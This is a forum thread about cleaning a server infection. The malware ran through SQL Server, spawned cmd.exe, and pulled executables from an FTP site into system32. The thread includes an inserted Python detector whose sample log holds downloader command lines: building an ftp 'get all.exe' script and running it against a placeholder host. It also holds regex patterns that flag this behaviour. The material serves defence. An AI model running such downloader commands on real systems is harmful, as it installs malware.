Server Virus - d.vbs, run.vbs, youtou.sys

I have a virus on a server that seems to be running somewhere on the server, accessing an external ftp site and downloading more files to the server.

Common files I find are in the system32 folder:

1.bat
2.bat
1.txt
2.txt
youtou.sys
d.vbs
run.vbs
sysme.bat
ntdos87.bat

There are more. I found a txt file called cc1.txt that had an ftp site listed with username and password and it was getting files all.exe and 2.exe.

Anyone seen this and know how I can remove it?? I have Trend Micro Worry-free security installed, malwarebytes, spyware doctor and prevx, but none can pick it up.



wint100 asked:
 
Adam Leinss, Senior Desktop Engineer, commented:
If you still have the WinPE CD around, try downloading the Mcafee SuperDat from
http://download.nai.com/products/licensed/superdat/english/intel/sdat5600.exe
Extract the contents by running the EXE with a "/e" switch
Scan the drive with "scan C: /clean"
I don't think the virus is in the SQL database, because the database is just flat data.  The virus is probably just hooked into the service because that's just one of the things that start with Windows.
0
 
Adam Leinss, Senior Desktop Engineer, commented:
Boot the server with UBCD4WIN (http://www.ubcd4win.com/), then run Sophos command line (with the latest IDEs) from here:
http://www.sophos.com/support/knowledgebase/article/13251.html
I had a piece of malware called entuala.dll that was not picked up by NOD32 or Malwarebytes, but Sophos did pick it up.
0
 
warturtle commented:
Have you done the MalwareBytes scan in safe mode?? or normal mode?? I suggest you try a scan in safe mode if you haven't already before trying out the below instructions. In safe mode, it will pick up a lot more than you would normally think. Lots of in-memory viruses are not loaded in background in safe mode and hence, can be caught by scanners. Following this, you should scan with Trend Micro scanner.

If the above doesn't work then, I would suggest downloading ComboFix from http://download.bleepingcomputer.com/sUBs/ComboFix.exe , saving it with a completely different filename like jabba.exe and then rebooting your server in safe mode. Then, disable all your antivirus, firewall and antispyware programs and run ComboFix, it will scan and create a log. After the log is created, please re-activate your security programs and send the log to us.

Further instructions are here:
http://www.bleepingcomputer.com/combofix/how-to-use-combofix

I suggest that you scan the server with MalwareBytes in safe mode right after ComboFix is done, you should see MalwareBytes picking up infections now.

Hope it helps.
0

 
wint100 (Author) commented:
Tried the above solutions, it found a registry entry in image for execution option\cscript.exe. This has been removed, but the files still reappeared last night in the system32 folder.

yantou.sys
setuplp.bat
1.txt
0
 
warturtle commented:
Did you try ComboFix ?? If yes, can you send us the log to inspect?
0
 
wint100 (Author) commented:
ComboFix doesn't support Windows 2003 Server.

The infected machine is a Windows 2003 Domain Controller.
0
 
warturtle commented:
Oops, sorry. Could you try Process Explorer and see if you see anything strange running in the background ?

http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx

Alternatively, you can send us a HijackThis log to see the background processes:
http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis

0
 
wint100 (Author) commented:
I tried Process Explorer but didn't see anything obvious.

Hijackthis log is attached.
hijackthis.log
0
 
wint100 (Author) commented:
Does AutoexNT.exe need to be running or could this be a cloaked virus?
0
 
warturtle commented:
It looks like a legitimate file. I suggest that you download UnHackMe from http://www.greatis.com/unhackme/ and install and run it. It will scan your system and study the boot processes and give a report that contains the name of the suspicious programs that are running at bootup. While operating this program, please have a look at the screenshots to learn how it works:

http://www.greatis.com/unhackme/antirootkit.htm

0
 
wint100 (Author) commented:
I tried UnHackMe without much success.

I have been monitoring things with Process Monitor and found 2 instances of CMD.exe running under an sqlserver parent process. The CMD.exe were running with a command string which included the file names that kept appearing in the system32 folder. It looks like something is running the command, searching for files on a remote ftp server, and dumping files to system32. The virus looks to be in the SQL database.

I am running MSDE, is there a way to find the files in the SQL database?

0
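The observation in this post (cmd.exe launched by the SQL Server process, assembling an ftp script and dropping files into system32) is the kind of parent/child relationship a defender can flag mechanically. The Python below is an added example, not code from this thread or from any of the tools mentioned: it parses a constructed, simplified process-creation log (parent image, child image, command line, tab-separated; the records are invented for the demo, and the hostname ftp.example.invalid is a placeholder) and reports shell or script interpreters spawned by sqlservr.exe, `ftp -s:` script usage, and redirects that write into system32.

```python
"""Flag shell/script children of sqlservr.exe and ftp-script downloaders
in simplified process-creation records (added example, constructed data)."""
import ntpath
import re
from dataclasses import dataclass

# Constructed sample log (not real telemetry). One record per line:
# <parent image> TAB <child image> TAB <child command line>
SAMPLE_LOG = "\n".join([
    "C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\sqlservr.exe\t"
    "C:\\WINDOWS\\system32\\cmd.exe\t"
    "cmd.exe /c echo get all.exe >> C:\\WINDOWS\\system32\\cc1.txt",
    "C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\sqlservr.exe\t"
    "C:\\WINDOWS\\system32\\cmd.exe\t"
    "cmd.exe /c ftp -n -s:C:\\WINDOWS\\system32\\cc1.txt ftp.example.invalid",
    "C:\\WINDOWS\\system32\\services.exe\t"
    "C:\\WINDOWS\\system32\\svchost.exe\tsvchost.exe -k netsvcs",
    "C:\\WINDOWS\\explorer.exe\tC:\\WINDOWS\\system32\\cmd.exe\tcmd.exe",
])

# A database engine has no business launching these interactively.
DB_PARENTS = {"sqlservr.exe"}
SUSPECT_CHILDREN = {"cmd.exe", "cscript.exe", "wscript.exe", "ftp.exe"}

# "ftp [-flags] -s:<script>" drives the command-line ftp client from a file.
FTP_SCRIPT_RE = re.compile(r"\bftp(?:\.exe)?\b(?:\s+-\S+)*\s+-s:(\S+)", re.I)
# ">" or ">>" redirect whose target lives under a system32 directory.
SYSTEM32_WRITE_RE = re.compile(r">>?\s*(\S*\\system32\\\S+)", re.I)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def parse_events(text):
    """Turn the tab-separated sample format into ProcEvent records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parent, image, cmd = line.split("\t", 2)
        events.append(ProcEvent(parent, image, cmd))
    return events


def analyse(event):
    """Return the list of reasons an event is suspicious (empty if none)."""
    reasons = []
    parent = ntpath.basename(event.parent_image).lower()
    child = ntpath.basename(event.image).lower()
    if parent in DB_PARENTS and child in SUSPECT_CHILDREN:
        reasons.append(f"db-spawned-shell:{parent}->{child}")
    ftp = FTP_SCRIPT_RE.search(event.command_line)
    if ftp:
        reasons.append(f"ftp-script:{ftp.group(1)}")
    drop = SYSTEM32_WRITE_RE.search(event.command_line)
    if drop:
        reasons.append(f"drops-into-system32:{drop.group(1)}")
    return reasons


def find_suspicious(events):
    """Pair each flagged event with its reasons; unflagged events are dropped."""
    hits = []
    for event in events:
        reasons = analyse(event)
        if reasons:
            hits.append((event, reasons))
    return hits


if __name__ == "__main__":
    for event, reasons in find_suspicious(parse_events(SAMPLE_LOG)):
        print(f"{ntpath.basename(event.parent_image)} -> {event.command_line}")
        for reason in reasons:
            print(f"    {reason}")
```

The interactive cmd.exe under explorer.exe and the svchost.exe under services.exe produce no findings, so the rule keys on the database process as parent rather than on cmd.exe alone; the ftp-script reason also hands you the script path (here cc1.txt) to collect, which is where the thread found the credentials and the "get" commands.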
 
wint100 (Author) commented:
What if I backed up the SQL database, uninstalled MSDE and installed SQL Express 2008? I've been meaning to upgrade for weeks anyway to increase my database limit.
0
 
warturtle commented:
I suggest a full scan with Kaspersky Online Scanner based at: http://www.kaspersky.co.uk/virusscanner . This scan wouldn't remove any infections, but will detect them and report back. Do this in IE by the way, it will install an ActiveX component. After the updates are done, click on 'Scan Settings' and check 'Extended Database' and then click OK and start scanning. After the scan is done, save the scan results as a text file and post it here. Kaspersky has the highest rates of detection and should hopefully tell us what is creating those files.

If the Worm is still around and you upgrade the SQL Server, it might not really solve the problem. The worm might still connect to FTP sites and download stuff.  As far as I understand, you have this trojan - Trojan-Downloader.BAT.Ftp.ab or one of its variants( http://www.viruslist.com/en/viruses/encyclopedia?virusid=76295 ).

0
 
wint100 (Author) commented:
OK, I'll give it a go.

I've connected to the database and 2 tables exist under the master database called:

dbo.resultcmd_cc and dbo.tmpdata.

Should these be there? I've checked another SQL server and they aren't present. All the apps using SQL are using separate instances.
0
 
warturtle commented:
It doesn't really ring a bell, I haven't used SQL Server much. It might be worth having a look at the data within those tables to see if its relevant to the organisation, moreover, it might also be worth having a quick look at Stored Procedures within SQL Server that use these tables. That might give a clue.
0
 
wint100 (Author) commented:
Will do cheers. Just running the Online scanner now so I'll view result in the morning.
0
 
wint100 (Author) commented:
Looks like the virus is now clean. Kaspersky online scanner found nothing after I deleted the 2 suspect tables from the SQL database.

I sent the files I found in the system32 off to Trend Micro and they confirmed it was:

dhcp.exe (799,744 bytes) as TROJ_SERVU.AK

run.vbs (1,082 bytes) as VBS_SMALL.C


Thanks
0
 
warturtle commented:
That's good stuff! It's new for me to see a virus that was sort of embedded in SQL Server, or at least its information/instructions were. Do a full scan with Trend Micro antivirus as a last check and if that comes clean, then you're good to go.
0